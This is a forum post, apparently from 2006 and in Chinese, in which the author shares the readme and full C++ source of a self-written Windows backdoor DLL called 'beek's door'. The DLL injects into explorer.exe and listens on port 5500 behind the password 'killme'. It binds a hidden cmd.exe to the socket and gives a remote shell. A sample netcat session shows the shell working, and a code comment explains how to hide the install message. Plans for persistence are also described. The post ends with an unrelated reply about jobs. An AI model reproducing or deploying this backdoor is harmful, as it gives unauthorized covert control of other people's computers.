beek's door v0.1 readme

1.连接端口5500
2.连接密码killme
3.请把后gate主体dll文件放在C:\windows\system32下面，运行exe loader就加载了
3.没有做启动设置，dll自动插入explorer进程，重新启动后后gate自动卸载
4.连接进入后gate后输入"?"会有操作提示
5.时间比较匆忙 饿了几顿饭写出来的 主要是检验自己所学 望高手指点
6.下一版本完善启动 预计将添加服务启动和PE文件IAT表启动两种方式
7.下一版本增加pslist，pskill，fport等功能


写这个东西主要是为巩固
AdjustTokenPrivileges
WriteProcessMemory
GetProcAddress
CreateRemoteThread
等几个API的使用

还望高手指点一二
MSN:bekilledlzy@hotmail.com

-------------------------------------------------
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd\

C:\>e:

E:\>cd tools

E:\tools>nc 127.0.0.1 5500
Please Enter Your PassWord:killme
Welcome to Beek's First Shell!
Input "?" for help!
Command:> ?
?     --help
shell   --open a cmd shell
quit   --quit shell
Command:> shell
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>

Copy code

// MyFirstDoorDll.cpp : 定义 DLL 应用程序的入口点。
//beek 2006-11-07
//

#include "stdafx.h"
#include <winsock2.h>

//#pragma comment(lib,"kernel32.lib")
#pragma comment(lib,"ws2_32.lib")

#ifdef _MANAGED
#pragma managed(push, off)
#endif

char cHelp[] = "?   --help\r\nshell   --open a cmd shell\r\nquit\t--quit shell\r\n";
           
int StartCmdShell(SOCKET clientSock)
{
  STARTUPINFO si;
  ZeroMemory(&si,sizeof(si));
  si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
  //隐藏窗口
  si.wShowWindow = SW_HIDE;
  //绑定CMD输入输出到套接字句柄
  si.hStdInput = si.hStdOutput = si.hStdError = (void *)clientSock;
  char cmdLine[] = "cmd.exe";
  PROCESS_INFORMATION ProcessInformation;
  int ret;
  //建立子进程  
  ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
  WaitForSingleObject(ProcessInformation.hProcess, INFINITE);
  TerminateProcess(ProcessInformation.hProcess, 0);
  CloseHandle(ProcessInformation.hProcess);
  return 1;
}

DWORD WINAPI DoorStart(LPVOID lpParam)
{
  WSADATA wsa;
  SOCKET listener;
  char buffer[1024],cmd[1024],psw[1024];
  int ret;
  unsigned long lBytesRead;
  struct sockaddr_in serverAddr;
  //struct sockaddr_in clientAddr;
  int iClientAddrLength;

  WSAStartup(MAKEWORD(2,2),&wsa);
  listener = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
  //[屏蔽]本地5500
  serverAddr.sin_family = AF_INET;
  serverAddr.sin_port = htons(5500);
  serverAddr.sin_addr.s_addr = ADDR_ANY;
 
  if((ret=bind(listener,(struct sockaddr *)&serverAddr,sizeof(serverAddr))) == SOCKET_ERROR)
  {
    MessageBox(NULL,"bind error","OK",MB_OK);
  }  
  if((ret=listen(listener,2) )== SOCKET_ERROR)
  {
        MessageBox(NULL,"listen error","OK",MB_OK);
  }
 
  //iClientAddrLength = sizeof(clientAddr);
  iClientAddrLength = sizeof(serverAddr);

again:
  SOCKET clientSock = accept(listener,(sockaddr*)&serverAddr,&iClientAddrLength);
  send(clientSock,"Please Enter Your PassWord:",sizeof("Please Enter Your PassWord:"),0);
 
  //清空密码buffer：
  ZeroMemory(psw,1024);
  lBytesRead = 0;

  //接受输入密码
  while(lBytesRead <256)
  {
    if(recv(clientSock,buffer,1,0) == SOCKET_ERROR)
    {
        closesocket(clientSock);
        goto again;
    }
    psw[lBytesRead] = buffer[0];
    lBytesRead++;
  }

  //如果密码正确则打开shell：
  if(strcmp(psw,"killme") ==0)
  {
    send(clientSock,"Welcome to Beek's First Shell!\n\rInput \"?\" for help!\n\r",sizeof("Welcome to Beek's First Shell!\n\rInput \"?\" for help!\n\r"),0);
    send(clientSock,"Command>",sizeof("Command>"),0);
    while(true)
    {
          ZeroMemory(cmd,1024);
          lBytesRead = 0;
         
          while(lBytesRead<256)
          {
            if(recv(clientSock,buffer,1,0) == SOCKET_ERROR)
            {
                closesocket(clientSock);
                goto again;
            }
            cmd[lBytesRead] = buffer[0];
            lBytesRead++;
          }
         
          if(strcmp(cmd,"?")==0)
          {
            send(clientSock,cHelp,sizeof(cHelp),0);
          }
 
          if(strcmp(cmd,"shell")==0)
          {
            send(clientSock,"Create Shell OK.\n",sizeof("Create Shell OK.\n"),0);
            StartCmdShell(clientSock);
            //send(clientSock,"Exit Shell.\n",sizeof("Exit Shell.\n"),0);
          }
         
          if(strcmp(cmd,"quit")==0)
          {
            closesocket(clientSock);
            goto again;
          }
         
          if(strlen(cmd))
          {
            send(clientSock,"Command>",sizeof("Command>"),0);
          }
          Sleep(100);

    }

  }
  else
  {
    closesocket(clientSock);
    goto again;
  }
  return 0;
}

BOOL APIENTRY DllMain( HMODULE hModule,
              DWORD ul_reason_for_call,
              LPVOID lpReserved
              )
{
  switch(ul_reason_for_call)
  {
    case DLL_PROCESS_ATTACH:
        {
          //编译时下面这句提示注释掉以便隐藏
          MessageBox(NULL,"Telnet localhost 5500 port for a shell.\nInstall finished,Restart Your Computer to remove it~","Inject DLL Success!",MB_OK);
         
          //建立后gate线程，回调函数DoorStart调用winsock库函数进行[屏蔽]，DoorStart必须申明为回调
          CreateThread(NULL,NULL,DoorStart,NULL,NULL,NULL);
        }
    default:
        return TRUE;
  }
  return TRUE;
}

#ifdef _MANAGED
#pragma managed(pop)
#endif

[ 此贴被111111111在2006-11-07 14:22重新编辑 ]

Quote:

引用第1楼piaoliu于2006-11-06 21:13发表的:
lz强
gg签了工作了没有？
偶也在学习编程，不过现在很迷茫啊
应用层次的不想学，比如web，数据库之类，都不知道该学什么好了
前几天签了步步高，以后做嵌入编程
.......

嵌入式好啊,玩好了ARM很能吃票子